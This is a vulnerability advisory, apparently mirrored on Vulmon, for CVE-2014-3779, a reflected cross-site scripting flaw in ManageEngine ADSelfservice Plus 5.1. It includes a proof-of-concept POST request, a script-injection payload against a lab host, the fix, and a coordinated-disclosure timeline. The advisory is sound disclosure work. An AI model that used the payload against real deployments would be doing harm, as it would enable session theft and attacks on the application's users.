Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

ADSelfservice Plus 5.1 Cross Site Scripting

Related Vulnerabilities: CVE-2014-3779  
Publish Date: 03 Jan 2015
Author: Blessen Thomas
Source 
                							

                
Security Advisory : 
Exploit Title: 
Manageengine ADSelfservice Plus Reflected Cross Site Scripting (XSS)
Google dork : N/A
Exploit Author: Blessen Thomas
Date : 03-01-2015
Vendor Homepage : 
Software Link : N/A

Version :

ADSelfservice Plus version 5.1 Build :5102 , Evaluation version –Trial

Tested on :

Windows XP SP2 -Host machine ,Windows server 2003 as Active directory

CVE-2014-3779

Type of Application :  Web application

Release mode : Coordinated disclosure

Vulnerability Description : 
It is observed that the Manageengine ADSelfservice Plus  is vulnerable to reflected cross site scripting(non-persistent/temporary) cross site scripting attacks in the “name” parameter and
the unfiltered input is reflected to the user 


Proof of concept :

Request :

POST /GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription HTTP/1.1
Host: 192.168.163.134:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription
Cookie: JSESSIONIDADSSP=A4144A81CF9702C53035062DBA9CD0F3; JSESSIONIDSSO=D8EE830B96B0218E4548BA3B8ADD09DB; adsspcsrf=79cf454e-9b3f-462b-bb12-03b70cd2f469
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

subID=0&name=test"";</script><script>alert(0)</script><"&desc=test&domains=test.com&domainName=test.com&hidden_grps=%7B%22group%22%3A%7B%22%7B1CE0BEAF-207E-4C48-B893-8A3B0FB49CFF%7D%22%3A%22Account+Operators%22%7D%7D&hidden_usrs=%7B%22user%22%3A%7B%22%7BC4520992-9D3F-439D-82F7-0869AF3BF267%7D%22Administrator%22%7D%7D&viewMembers=on


Parameter affected:

name

Payload (Exploit Code):

"";</script><script>alert(0)</script><"

Vulnerable link: 

192.168.163.134:8888/GroupSubscription.do?selectedTab=configuration&selectedTile=GroupSubscription 



Tools used :

Mozilla firefox browser v28.0 , Burp proxy free edition v1.5


## Workaround ##
----------------
Update to newer Version 5.2 Build 5202 
http://www.manageengine.com/products/self-service-password/download.html?btmMenu 
 
## TimeLine ##
----------------------
13th Apr 2014 : Bug Discovered
15th Apr 2014 : vendor was notified by e-mail
16th Apr 2014 : Vendor response received
13th  May 2014 : Vendor acknowledged and released a patch
22nd  May 2014 : Mitre Team provided CVE id
03rd Jan 2015 : Public Disclosure



<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started